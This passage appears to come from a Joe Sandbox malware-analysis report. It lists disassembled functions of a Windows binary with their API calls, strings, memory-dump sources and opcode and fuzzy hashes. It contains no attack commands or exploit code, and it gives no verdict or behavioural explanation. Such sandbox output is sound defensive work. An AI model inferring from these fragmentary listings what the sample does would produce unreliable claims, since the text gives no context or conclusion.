                                                                                                                                                  • _memset.LIBCMT ref: 00486FDD
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                                  • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                  • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                                                                                  • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                  • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                                                                                  Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                  • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                  • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                                                                                  • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                  • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                                                                                  Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • CoInitialize.OLE32 ref: 00478403
                                                                                                                                                  • CoUninitialize.OLE32 ref: 0047840E
                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                                  • Opcode ID: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
                                                                                                                                                  • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                                                                                  • Opcode Fuzzy Hash: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
                                                                                                                                                  • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                                                                                  Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0046B550
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                                  • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                  • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                                                                                  • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                  • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                                                                                  Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                                                                                  • GetParent.USER32 ref: 0045903B
                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                                                                                  • GetParent.USER32(?), ref: 00459063
                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                                  • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                  • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                                                                                  • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                  • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                                                                                  Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00459108
                                                                                                                                                  • GetParent.USER32 ref: 00459124
                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                                                                                  • GetParent.USER32(?), ref: 0045914C
                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                                  • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                  • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                                                                                  • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                  • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                                                                                  Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetParent.USER32 ref: 0045916F
                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00459196
                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                                  • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                  • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                                                                                  • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                  • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                                                                                  Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                  • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                  • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                                                                                  • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                  • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                                                                                                  Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                                  • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                  • API String ID: 2862541840-2080382077
                                                                                                                                                  • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                  • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                                                                                  • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                  • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                                                                                  Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                                  • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                                                                                  • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                                                                                  • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                                                                                  • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                                                                                  Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                                                                                    • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                                                                                    • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                                                                                    • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                                                                                  • GetDC.USER32 ref: 0043CD32
                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                  • String ID: U
                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                  • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                  • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                                                                                  • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                  • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                                                                                  Function 00AB1A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlDecodePointer.NTDLL(00000000), ref: 00AB1A3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                  • API String ID: 3527080286-3064271455
